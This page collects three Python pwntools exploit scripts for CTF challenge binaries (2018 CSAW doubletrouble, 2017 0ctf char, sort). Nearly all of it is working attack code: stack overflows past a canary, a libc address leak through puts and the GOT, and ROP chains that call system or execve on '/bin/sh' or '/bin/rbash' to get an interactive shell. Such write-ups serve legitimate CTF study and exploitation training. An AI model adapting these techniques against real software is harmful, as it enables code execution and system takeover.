
令人绝望的 Pwn PoC 总结

2018 CSAW - doubletrouble

题目链接:doubletrouble.zip

from pwn import *

# 1 runs the challenge binary as a local process; any falsy value makes the
# script connect to the remote service instead.
local = 1

# Parsed once so the stages below can look up PLT/GOT/symbol addresses by name.
elf = ELF('./doubletrouble')

# pwntools tube that every helper below reads from and writes to.
io = process('./doubletrouble') if local else remote('pwn.chal.csaw.io', 9002)

def d2b(f):
    """Return the 8-byte little-endian encoding of the double f."""
    packed = struct.pack('<d', f)
    return packed

def b2d(f):
    """Reinterpret the 8 bytes in f as a little-endian double and return it."""
    (value,) = struct.unpack('<d', f)
    return value

def sendNum(num):
    """Log num, then send it in '%.20e' notation once the 'Give me: ' prompt arrives."""
    # 20 fractional digits are more than a double holds, so the text should
    # parse back to the same 64-bit pattern on the receiving side.
    wire_text = '%.20e' % num
    print('sendNum: %.20e' % num)
    io.sendlineafter('Give me: ', wire_text)

def sendNumPair(num1,num2):
    """Send two 32-bit integers to the target as one double.

    The p32 encodings of num1 and num2 are concatenated (num1 first) and the
    resulting eight bytes are reinterpreted as a double before being passed
    to sendNum.
    """
    raw_bytes = p32(num1) + p32(num2)
    as_double = b2d(raw_bytes)
    sendNum(as_double)

def pwn1(): # leak got addr
    """Stage 1: send 64 doubles that make the target print the address of puts.

    Per the inline comments, the crafted values call puts through its PLT
    entry with the GOT slot of puts as the argument, then re-enter _start so
    that a second round of input (pwn2) can use the printed address.

    Every literal address is hard-coded for this one build of
    ./doubletrouble; none of them is derived at run time.
    NOTE(review): the statements are order-sensitive with respect to the
    target's input handling -- do not reorder them.
    """
    # Announce 64 values; the counts below add up to exactly that (7 + 7 + 50).
    io.sendlineafter('How long: ','64')
    for i in range(7): sendNum(-100)
    sendNum(-99) # junk_canary
    sendNum(-98) # junk
    sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
    sendNum(-98) # junk
    sendNumPair(elf.plt['puts'], 0x080498A2) # plt.puts ; ret: [pop edi ; pop ebp ; ret]
    sendNumPair(elf.got['puts'], 0x080498A8) # got.puts ; junk
    sendNumPair(elf.symbols['_start'], 0x080498AC) # program run again ; junk
    # Pad with filler up to the announced count of 64.
    for i in range(64-7-7): sendNum(-98)

def pwn2(): # call system & get shell
    """Stage 2: read the address printed by stage 1 and send the final input.

    The four bytes received are interpreted as the run-time address of puts.
    The libc base and the addresses of system and of a shell-path string are
    then derived from hard-coded offsets, and a second set of 64 doubles is
    sent.

    The offsets differ between the local and the remote branch; each set fits
    one specific libc build, and the page does not say which builds they are.
    With any other libc the computed addresses are wrong.
    """
    io.recvuntil('70:')
    io.recvline() # junk
    data=io.recv(4) # get got addr
    # '***' means the target printed its stack-protector abort banner instead
    # of the expected bytes; that run is over, so the script exits and has to
    # be started again.
    if '***' in data:
        print 'stack smashing detected, try again!'
        exit()
    libc_puts_addr=u32(data)
    if local:
        # Offsets of puts, system and the shell-path string in the local libc.
        libc_base_addr=libc_puts_addr-0x67e30
        libc_system_addr=libc_base_addr+0x3d7e0
        libc_sh_addr=libc_base_addr+0x17c968
    else:
        # Same three offsets for the libc used by the remote service.
        libc_base_addr=libc_puts_addr-0x67b40
        libc_system_addr=libc_base_addr+0x3d200
        libc_sh_addr=libc_base_addr+0x17e0cf
    print 'libc_puts_addr: %s' % hex(libc_puts_addr)
    print 'libc_base_addr: %s' % hex(libc_base_addr)
    print 'libc_system_addr: %s' % hex(libc_system_addr)
    print 'libc_sh_addr: %s' % hex(libc_sh_addr)
    if not local:
        # Remote only: the line after the next one is parsed as a hexadecimal
        # stack address taken from the program's own output.
        io.recvline() # junk
        stack_addr=int(io.recvline().strip(),16)
        print 'stack_addr: %s' % hex(stack_addr)
    io.sendlineafter('How long: ','64')
    if local:
        # 6 + 6 + 52 values = the 64 announced above.
        for i in range(6): sendNum(-100)
        sendNum(-99) # junk_canary
        sendNum(-98) # junk
        sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
        sendNum(-98) # junk
        sendNumPair(libc_system_addr, 0x080498A2) # system() in libc (computed above, not a GOT slot) ; fake_ret
        sendNumPair(libc_sh_addr, 0x080498A8) # shell-path string in libc (computed above) ; junk
        for i in range(64-6-6): sendNum(-98)
    else:
        # 8 + 8 + 48 values = the 64 announced above.
        for i in range(8): sendNum(-100)
        sendNum(-99) # junk_canary
        sendNum(-98) # junk
        sendNumPair(0xF7FFFFFF, 0x0804977C) # fake ebp ; eip: [pop esi ; pop ebp ; ret]
        sendNum(-98) # junk
        sendNumPair(libc_system_addr, 0x080498A2) # system() in libc (computed above, not a GOT slot) ; fake_ret
        sendNumPair(stack_addr+0x230, 0x080498A8) # stack.str_command ; junk
        #sendNumPair(0x2F20736C, 0x6E69622F) # ls //bin
        #sendNumPair(0x00000000, 0x6E696230) # \x00 ; junk
        # The next two pairs spell the command string itself; the remote
        # branch does not use libc_sh_addr.
        sendNumPair(0x6E69622F, 0x6162722F) # /bin/rba
        sendNumPair(0x00006873, 0x61627230) # sh\x00 ; junk
        for i in range(64-8-8): sendNum(-98)

# Run the two stages in order: pwn1 makes the target print an address and
# restart, pwn2 consumes that output and sends the second round of input.
pwn1()
pwn2()
# Hand the tube over to the terminal for manual interaction.
io.interactive()

2017 0ctf - char

题目链接:char.zip

from pwn import *

# Start the challenge binary locally; all I/O below goes through this tube.
io=process('./char')
# Fixed libc load address assumed by this script. Every gadget address below
# is libc_base plus a hard-coded offset, so the script only works while libc
# is mapped at exactly this address and is exactly the build these offsets
# were taken from.
# NOTE(review): a constant base implies address randomisation is not in
# effect for this target -- confirm.
libc_base=0x5555e000

# 0x1c + 0x4 filler bytes precede the first gadget address.
payload='a'*0x1c+'a'*0x4
payload+=p32(libc_base+0x000a8456) # xchg ebx, ecx ; test edx, edx ; je 0xa8467 ; mov dword ptr [edx], eax ; ret
payload+=p32(libc_base+0x00094b49) # pop ebx ; pop esi ; ret
# str_sh_addr=ebx+esi (0x2a355b76 + 0x2b365c76 = 0x556bb7ec, the value the
# original comment carried on the gadget line above)
payload+=p32(0x2a355b76) # ebx
payload+=p32(0x2b365c76) # esi
payload+=p32(libc_base+0x00187554) # add ebx, esi ; add dword ptr [edx], ecx ; ret
# Per the gadget listings, the next two leave edx = 0 (0xffffffff + 1) and
# eax = 0.
payload+=p32(libc_base+0x000b9940) # mov edx, 0xffffffff ; cmovne eax, edx ; ret
payload+=p32(libc_base+0x000e4d7a) # inc edx ; xor eax, eax ; ret
# Eleven increments from zero give eax = 0x0b, the i386 system-call number
# that the interrupt below dispatches on.
payload+=p32(libc_base+0x000e6263)*11 # inc eax ; ret
payload+=p32(libc_base+0x00109177) # int 0x80
# Dump the raw payload to stdout for inspection before sending it.
print payload
io.sendafter('GO : ) \n',payload)

# Hand the tube over to the terminal for manual interaction.
io.interactive()

sort

题目链接:sort.zip

from pwn import *

# Debug logging makes pwntools print every chunk sent and received.
context.log_level='debug'
# Start the challenge binary locally; all later I/O goes through this tube.
io=process('./sort')

def send_num(num):
    """Send num to the target as decimal text on a line of its own."""
    decimal_text = str(num)
    io.sendline(decimal_text)

# Announce 32 numbers; the send_num calls below add up to exactly that
# (4 + 5 + 22 + 1).
io.sendlineafter('be sorted: \n','32')
io.recvuntil('no. : \n')

# All addresses below are hard-coded absolutes, so the script assumes this
# exact build of ./sort mapped at the same addresses on every run.
# NOTE(review): that implies a non-position-independent binary -- confirm.
for i in range(0x4):
    send_num(0xfffffffe) # junk code
send_num(0xffffffff) # fake ebp
send_num(0x0804887c) # eip: getinp
send_num(0x080eba24) # fake ret addr
send_num(0x080eba28) # getinp param1: read addr
send_num(0x080eba2C) # getinp param2: read len
for i in range(0x20-10):
    send_num(0x080eba30) # junk code
send_num(0x080eba34) # eip

# Second input: the bytes delivered to the read address 0x080eba28 named
# above. The first three words are data (four zero bytes, then the string
# "/bin/sh\x00" starting at 0x080eba2c); the rest is a chain of gadget
# addresses and the values they pop into registers.
payload=p32(0x00000000) # \x00\x00\x00\x00
payload+=p32(0x6e69622f) # nib/  (little-endian, i.e. "/bin" in memory)
payload+=p32(0x0068732f) # \x00hs/  (little-endian, i.e. "/sh\x00" in memory)
payload+=p32(0xfffffffe)*2 # junk code
payload+=p32(0x08052b14) # pop eax ; ret
payload+=p32(0x080eba28) # getinp param1: read addr ; bypass 0x080488B3
payload+=p32(0x08052b14) # pop eax ; ret
payload+=p32(0x0000000b) # eax: 0x0b
payload+=p32(0x080481c9) # pop ebx ; ret
payload+=p32(0x080eba2c) # ebx addr: /bin/sh\x00
payload+=p32(0x080dedf5) # pop ecx ; ret
payload+=p32(0x080eba28) # ecx addr: \x00\x00\x00\x00
payload+=p32(0x0806fdda) # pop edx ; ret
payload+=p32(0x080eba28) # edx addr: \x00\x00\x00\x00
payload+=p32(0x0806da43) # int 0x80
io.send(payload)

# Hand the tube over to the terminal for manual interaction.
io.interactive()
